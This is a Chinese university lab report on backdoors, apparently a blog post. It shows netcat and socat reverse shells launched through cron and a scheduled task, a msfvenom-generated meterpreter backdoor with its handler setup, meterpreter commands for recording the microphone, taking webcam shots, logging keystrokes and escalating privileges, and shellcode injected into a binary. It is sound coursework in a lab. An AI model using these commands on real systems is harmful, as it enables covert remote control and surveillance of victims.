• # 20192407 202120222 《网络与系统攻防技术》实验二实验报告


    1.实验内容

    (1)使用netcat获取主机操作Shell,cron启动定时任务

    (2)使用socat获取主机操作Shell, 任务计划启动

    (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    (5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

    2.实验过程

    (1)使用netcat获取主机操作Shell,cron启动定时任务
    首先获取主机的ip地址:

    接着windows打开监听:

    在kali中使用cron指令:输入 crontab -e 并在最后一行添加 * * * * * /bin/netcat 192.168.1.160 8888 -e /bin/sh,让kali每分钟都执行一次指令,并可以用crontab -l指令查看:

    windows获得kali的shell:

    (2)使用socat获取主机操作Shell, 任务计划启动
    创建计划程序,设置名称,触发器,选择执行程序并在添加层数处输入指令tcp-listen:8888 exec:cmd.exe,pty,stderr把cmd.exe绑定到端口8888。



    到达指定时间后点击运行Windows会出现弹窗,在kali上启动监听,以连接上windows的shell

    (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
    在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.41.132 LPORT=8880 -f exe > meter_backdoor.exe生成后门程序“meter_backdoor.exe”。

    在Windows下执行ncat.exe -l 8888 > meter_backdoor.exe,这样被控主机就进入了接收文件模式,在kali中执行nc 192.168.0.100 5121 < meter_backdoor.exe

    windows成功接受了kali的exe文件

    在kali上使用msfconsole指令进入msf控制台

    输入use exploit/multi/handler使用监听模块,设置payload

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.41.132,这里用的是Kali的IP

    set LPORT 8888,同样要使用相同的端口
    设置完成之后,输入指令exploit执行监听,并运行Windows下的后门程序,此时kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

    (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
    使用record_mic指令可以截获一段音频
    使用webcam_snap指令可以使用摄像头进行拍照
    使用screenshot指令可以进行截屏
    使用keyscan_start指令记录下击键的过程,使用keyscan_dump指令读取击键记录
    使用getuid指令查看当前用户,使用getsystem指令进行提权操作

    (5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
    获得主机shell:msfvenom -p linux/x86/reverse_tcp LHOST=192.168.41.132 LPORT=8888 -x ./pwn20192407 -f elf >20192407xjypwnshellcode
    并监听

    3.问题及解决方案

    • 问题1:windows无法运行 ncat.exe
    • 问题1解决方案:将其换为兼容win7模式即可 。
    • 问题2:监听时无法产生音频
    • 问题2解决方案:电脑录音权限未打开,打开即可。
    • 问题3:打开文件权限不足
    • 问题3解决方案:使用chmod u+x *命令提权。

      回答问题:
      (1)例举你能想到的一个后门进入到你系统中的可能方式?
      qq,微信的一些可疑链接
      (2)例举你知道的后门如何启动起来(win及linux)的方式?
      通过驱动程序启动
      (3)Meterpreter有哪些给你映像深刻的功能?
      截获音频,使用摄像头,获得截屏,记录击键等
      (4)如何发现自己有系统有没有被安装后门?
      任务管理器查看有无可疑程序

    4.学习感悟、思考等

    本次实验内容虽然看似不多,但是在实际操作时还是遇到了很多问题,且电脑的一些设置也会对实验造成影响。通过这次实验,我对后门的知识有了进一步的了解,也对网络攻防的手段和预防有了更好的理解。

  • 相关阅读:
    VS2008编写MFC程序--使用opencv2.4()
    November 02nd, 2017 Week 44th Thursday
    November 01st, 2017 Week 44th Wednesday
    October 31st, 2017 Week 44th Tuesday
    October 30th, 2017 Week 44th Monday
    October 29th, 2017 Week 44th Sunday
    October 28th, 2017 Week 43rd Saturday
    October 27th, 2017 Week 43rd Friday
    October 26th, 2017 Week 43rd Thursday
    October 25th, 2017 Week 43rd Wednesday
  • 原文地址:https://www.cnblogs.com/xingjiyuan/p/16089000.html
Copyright © 2020-2023  润新知